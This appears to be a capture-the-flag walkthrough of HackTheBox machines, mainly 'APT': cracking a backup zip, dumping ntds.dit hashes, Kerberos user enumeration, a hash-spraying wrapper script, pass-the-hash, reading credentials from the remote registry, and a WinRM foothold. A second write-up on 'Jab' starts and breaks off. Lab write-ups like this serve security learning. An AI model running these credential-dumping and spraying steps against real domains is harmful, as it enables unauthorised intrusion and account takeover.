636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49698/tcp open unknown
54047/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
Analysis of the scan results
Looking at the result, these are clearly the typical port signature of a domain controller. Add the discovered domain name to the hosts file; ports 80, 135, 445 and 593 are the first to try. Visiting the web service over IPv6 shows the same site as over IPv4, so we do not consider it further.
Trying the SMB shares over IPv6
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbclient -L //htb.local
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
backup Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
htb.local is an IPv6 address -- no workgroup available
# Obviously, what interests us most is backup
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbclient //htb.local/backup
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 15:30:52 2020
.. D 0 Thu Sep 24 15:30:52 2020
backup.zip A 10650961 Thu Sep 24 15:30:32 2020
5114623 blocks of size 4096. 2634678 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (577.5 KiloBytes/sec) (average 577.5 KiloBytes/sec)
# Try the others:
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient //htb.local/IPC$
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient //htb.local/NETLOGON
Password for [WORKGROUP\root]:
Anonymous login successful
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
smb: \> exit
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient //htb.local/SYSVOL
Password for [WORKGROUP\root]:
Anonymous login successful
tree connect failed: NT_STATUS_CONNECTION_RESET
# Obviously, these are very valuable files, but unfortunately they are encrypted, and since they come from a backup they may not be the latest.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -l backup.zip
Archive: backup.zip
Length Date Time Name
--------- ---------- ----- ----
0 2020-09-23 19:40 Active Directory/
50331648 2020-09-23 19:38 Active Directory/ntds.dit
16384 2020-09-23 19:38 Active Directory/ntds.jfm
0 2020-09-23 19:40 registry/
262144 2020-09-23 19:22 registry/SECURITY
12582912 2020-09-23 19:22 registry/SYSTEM
--------- -------
63193088 6 files
# Obviously they are safe; we don't need to analyze them any more deeply.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -d backup backup.zip
Archive: backup.zip
creating: backup/Active Directory/
[backup.zip] Active Directory/ntds.dit password:
skipping: Active Directory/ntds.dit incorrect password
skipping: Active Directory/ntds.jfm incorrect password
creating: backup/registry/
skipping: registry/SECURITY incorrect password
skipping: registry/SYSTEM incorrect password
Trying to crack the zip
John the Ripper requires password hashes in a specific format. First convert the ZIP file's password hash into the proper format, using the zip2john utility bundled with John the Ripper.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# zip2john backup.zip > zip.hash
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ts=9CCA cs=acd0 type=8
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ts=9CCA cs=2a39 type=8
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ts=9AC6 cs=9beb type=8
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD ts=9AC6 cs=65d9 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2024-03-09 10:30) 20.00g/s 819200p/s 819200c/s 819200C/s 123456..loserface1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -d backup backup.zip
Archive: backup.zip
creating: backup/Active Directory/
[backup.zip] Active Directory/ntds.dit password:
inflating: backup/Active Directory/ntds.dit
inflating: backup/Active Directory/ntds.jfm
creating: backup/registry/
inflating: backup/registry/SECURITY
inflating: backup/registry/SYSTEM
We cracked it very quickly.
About ntds.dit:
NTDS.DIT is crucial in Active Directory. It serves as the centralized repository for all domain objects and their related information. Any change made to the domain, such as creating a new user account, modifying group membership or updating user attributes, is reflected in the NTDS.DIT file. The file acts as the single source of truth for the entire domain, enabling efficient management and authentication. Simply put, once we can read and parse the contents of this file, we obtain the hash information of the domain; cracking those hashes amounts to gaining control of the whole domain. Importantly, extracting and cracking these passwords can be performed offline, so it cannot be detected, and once an attacker has extracted the hashes, they can act as any user in the domain.
Reading ntds.dit with secretsdump
secretsdump also comes from the excellent impacket library and is well suited to reading ntds.dit.
┌──(root㉿hunter)-[/home/…/htb/APT/backup/Active Directory]
└─# export PATH=/usr/share/doc/python3-impacket/examples:$PATH
┌──(root㉿hunter)-[/home/…/htb/APT/backup/Active Directory]
└─# secretsdump.py -ntds ./ntds.dit -system ../registry/SYSTEM LOCAL > ../../user_hash_raw
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| wc -l
8005
# That is a lot of output. We only want the lines that carry an account's password hashes, the ones ending in ":::" (format user:rid:lmhash:nthash:::), and then try to match them against users.
# In a real engagement one could immediately try passing the Administrator hash to WinRM; there is some chance of success, but this is a lab target, so it will not be that easy.
Processing the data:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw | grep ':::' | awk -F':' '{print $1}' | sort -u > user_list
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw | grep ':::' | awk -F':' '{print $3":"$4}' | sort -u > hash_list
# The second command originally redirected to user_list as well, which would have overwritten the user list; hash_list is the file the later steps read, and sort -u removes the duplicate LM:NT pairs that would otherwise be sprayed twice.
Using Kerberos pre-authentication to validate users before spraying
From the output above we have roughly 2000 users and 2000 hashes. Spraying every hash against every user would be a huge number of combinations and very slow, so before spraying we should first filter out the valid usernames to cut the unnecessary work. The domain controller's pre-authentication mechanism makes this possible: an AS-REQ sent without pre-authentication data gets a different Kerberos error back for a user that exists (KDC_ERR_PREAUTH_REQUIRED) than for one that does not (KDC_ERR_C_PRINCIPAL_UNKNOWN), and since no password is ever tried, the check does not count towards account lockout. kerbrute automates this:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# kerbrute userenum -d htb.local --dc htb.local ./user_list
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/09/24 - Ronnie Flathers @ropnop
2024/03/09 11:49:52 > Using KDC(s):
2024/03/09 11:49:52 > htb.local:88
2024/03/09 11:50:03 > [+] VALID USERNAME: Administrator@htb.local
2024/03/09 11:51:09 > [+] VALID USERNAME: APT$@htb.local
2024/03/09 11:57:38 > [+] VALID USERNAME: henry.vinson@htb.local
2024/03/09 12:08:08 > Done! Tested 2000 usernames (3 valid) in 1096.093 seconds
This is not the only way; nmap's krb5-enum-users script does the same thing:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='htb.local',userdb=user_list htb.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 11:53 CST
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 43.78% done; ETC: 11:56 (0:01:40 remaining)
Nmap scan report for htb.local (dead:beef::b885:d62a:d679:573f)
Host is up (0.21s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| Administrator@htb.local
| henry.vinson@htb.local
|_ APT$@htb.local
Nmap done: 1 IP address (1 host up) scanned in 173.48 seconds
APT$ stands out: the trailing $ marks a machine account, in this case the computer account of the domain controller itself (the host's name is APT). It is not a hidden user, but its hash is still worth keeping, since a domain controller's computer account holds replication rights and could be used for a DCSync. With the valid users narrowed down to three, the obvious next step is to spray the 2000 hashes against them; a single matching pair gives us a foothold.
Trying the hash spray
crackmapexec can spray hashes as well; it needs to be told which protocol to use. Judging from the recon results only three protocols are candidates, and smb is the first choice. Unlike the Kerberos pre-authentication check, each of these attempts is a real logon that increments badPwdCount, so check the domain's lockout policy before firing 2000 hashes at three accounts:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# crackmapexec smb htb.local -u usr_effective -H hash_list
SMB htb.local 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:3ae49ec5e6fed82ceea0dc2be77750ab STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:531c98e26cfa3caee2174af495031187 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:fde29e6cb61b4f7fda1ad5cd2759329d STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:51d368765462e9c5aebc456946d8dc86 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:273c48fb014f8e5bf9e2918e3bf7bfbd STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:98590500f99a1bee7559e97ad342d995 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:10cf01167854082e180cf549f63c0285 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:6149000a4f3f7c57642cbee1ea70c3e1 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
...
After a few attempts the tool reports connection timeouts and then errors out; running it again gives the same result. The most likely explanation is that we have triggered a protective measure on the server: after a certain number of failures the connections are cut, and our IP may even be blocked.
Since this tool gets cut off, let's try something else, for example getTGT.py from the impacket library. It is meant for requesting a TGT, but along the way it reveals which hash is right: a wrong hash gets KDC_ERR_PREAUTH_FAILED back, the right one gets a ticket. We need a small wrapper script, getTGT_auto.sh, to feed it the hash list:
#!/bin/bash
# Feed each LM:NT pair in hash_list to getTGT.py for one user; a wrong hash returns KDC_ERR_PREAUTH_FAILED, the right one writes <user>.ccache.
rm -f henry.vinson@htb.local.ccache
while IFS='' read -r LINE || [ -n "${LINE}" ]
do
    [ -z "${LINE}" ] && continue
    echo "-----------------------"
    echo "Feed the Hash:${LINE}"
    /usr/share/doc/python3-impacket/examples/getTGT.py htb.local/henry.vinson@htb.local -hashes "${LINE}"
    if [ -f henry.vinson@htb.local.ccache ]; then
        echo "[+] Hit: ${LINE}"
        break
    fi
done < hash_list
We try one user first; if nothing matches, we move on to the next. When a TGT is obtained, a .ccache file is written, so alongside the script we run watch to see when that file appears, at which point the loop can be interrupted by hand:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# watch "ls -ltr | tail -2"
After a while we get a hit:
...
-----------------------
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:945f05a17a39217a6a8b58e9bd26ee46
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
-----------------------
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in henry.vinson@htb.local.ccache
...
Save the matching hash. Looking at its structure, the LM part is aad3b435b51404eeaad3b435b51404ee: that is the LM hash of an empty string, the fixed value stored when LM hashes are not kept (the default on current Windows), so only the NT half carries anything. Now that we have a valid user hash, the first thing to do is to try it for lateral movement with pass-the-hash.
Pass-the-hash: trying lateral movement
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
Sensitive information leaked through the registry
None of the common lateral-movement methods above worked. Another thing to try is reg.py from the impacket library to see whether we can read the remote registry. Strictly speaking that is not a lateral-movement technique, but when the usual methods get nowhere it is worth remembering: the remote registry service only asks for a valid account, and application settings stored under HKU sometimes contain plaintext credentials:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\
HKU\\Console
HKU\\Control Panel
HKU\\Environment
HKU\\Keyboard Layout
HKU\\Network
HKU\\Software
HKU\\System
HKU\\Volatile Environment
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\Classes
# Look at the familiar name, which is exactly the same as the one shown on the website. Obviously, this is what we want.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht
# This exposes a set of credentials!
We've obtained a set of credentials, and judging by the name it may be an admin account. Next, test whether they are valid:
Getting a foothold
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# evil-winrm -i htb.local -u henry.vinson_adm -p G1#Ny5@2dvht
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cat user.txt
0b3df55f82208fb1a9593113a8eac7d2
Post-exploitation enumeration
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cd ../../
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 7:54 AM Administrator
d----- 9/24/2020 8:39 AM henry.vinson
d----- 9/24/2020 8:40 AM henry.vinson_adm
d-r--- 11/21/2016 2:39 AM Public
# Enumerating the contents of all the directories again turns up no valuable information or permissions.
Trying to enumerate sensitive files
This uses a widely used wordlist of sensitive file paths, from the project:
https://github.com/carlospolop/Auto_Wordlists/
We can use its Windows file-inclusion wordlist:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
Filter it in the browser for a few common keywords:
passwd
history
Combining that with everything gathered so far, the file we end up suspecting most is the PowerShell command history (PSReadLine's ConsoleHost_history.txt), which lives in each user's profile. Trying it for each profile, the file exists for one user and we can read its contents:
*Evil-WinRM* PS C:\Program files> cat c:/users/administrator/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
Access is denied
At line:1 char:1
+ cat c:/users/administrator/appdata/roaming/microsoft/windows/powershe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\users\admini...ost_history.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\users\administrator\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt' because it does not exist.
At line:1 char:1
+ cat c:/users/administrator/appdata/roaming/microsoft/windows/powershe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\users\admini...ost_history.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program files> cat c:/users/henry.vinson/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
Cannot find path 'C:\users\henry.vinson\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt' because it does not exist.
At line:1 char:1
+ cat c:/users/henry.vinson/appdata/roaming/microsoft/windows/powershel ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\users\henry....ost_history.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program files> cat c:/users/henry.vinson_adm/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
The history shows henry.vinson_adm prompting for the Administrator's credentials and using them to set HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel to 2, which is "Send NTLM response only": a client on this host answers NTLM challenges with NTLMv1 rather than NTLMv2.
This tells us that the current user
Summary
.....
Jab
Machine description
Difficulty
Medium
Information gathering
Full TCP port scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sT --min-rate 10000 -p- 10.129.116.140 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:41 CST
Warning: 10.129.116.140 giving up on port because retransmission cap hit (10).
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 42.82% done; ETC: 16:44 (0:01:40 remaining)
Stats: 0:02:48 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.46% done; ETC: 16:44 (0:00:03 remaining)
Nmap scan report for 10.129.116.140
Host is up (0.26s latency).
Not shown: 60209 filtered tcp ports (no-response), 5320 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3269/tcp open globalcatLDAPssl
5270/tcp open xmp
Nmap done: 1 IP address (1 host up) scanned in 178.76 seconds
Processing the results:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# tcports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# export $tcports
export: not an identifier: 53,135,139,445,3269,5270
# The $ is the mistake: export expects the variable name, so `export tcports` is the correct form. The variable is set in this shell either way, which is all the next scan needs.
Detailed TCP scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sT -sC -sV -O -p53,135,139,445,3269,5270 10.129.116.140 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:52 CST
Nmap scan report for 10.129.116.140
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-01T08:53:32+00:00; -27s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
5270/tcp open ssl/xmpp Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (95%), Microsoft Windows 10 1709 - 1909 (92%), Microsoft Windows Server 2012 (91%), Microsoft Windows Vista SP1 (90%), Microsoft Windows Longhorn (90%), Microsoft Windows 10 1709 - 1803 (88%), Microsoft Windows 10 1809 - 2004 (88%), Microsoft Windows Server 2012 R2 (88%), Microsoft Windows Server 2012 R2 Update 1 (88%), Microsoft Windows Server 2016 build 10586 - 14393 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -26s, deviation: 0s, median: -27s
| smb2-time:
| date: 2024-03-01T08:53:24
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.41 seconds
UDP scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sU --top-ports 1000 10.129.116.140 -oA nmapscan/udports
# The original command line read "-p- 1000", which nmap would take as a full port range plus a bogus second target named 1000; scanning the 1000 most common UDP ports is the sensible reading.
Script vulnerability scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap --script=vuln -p53,135,139,445,3269,5270 10.129.116.140 -oA nmapscan/tcpvuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:53 CST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.59% done; ETC: 16:53 (0:00:01 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 88.50% done; ETC: 16:53 (0:00:01 remaining)
Nmap scan report for 10.129.116.140
Host is up (0.31s latency).
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3269/tcp open globalcatLDAPssl
5270/tcp open xmp
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 109.34 seconds
Exploitation
Trying to list SMB shares
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# smbmap -H 10.129.116.140
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
File "/usr/bin/smbmap", line 33, in <module>
sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
host = [ host for host in share_drives_list.keys() ][0]
